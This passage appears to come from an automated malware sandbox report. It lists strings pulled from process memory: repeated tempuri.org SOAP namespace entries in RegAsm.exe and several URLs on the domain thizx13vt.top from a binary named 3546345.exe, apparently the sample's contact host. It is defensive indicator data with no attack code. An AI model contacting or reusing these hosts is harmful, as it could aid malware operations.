                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Ent
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10LRjq$
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19LRjq$
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1LRjq$
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LRjq(
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LRjqt
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23LRjqp
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6LRjq(
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Responsex
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LRjq
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Responsex
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/#F
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/)
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/1F
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/2
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/:F
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/DG
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/E
                        Source: 3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/F
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/N
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/RG
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/S
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/a
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/g
                        Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/iG
                        Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://thizx13vt.top/j
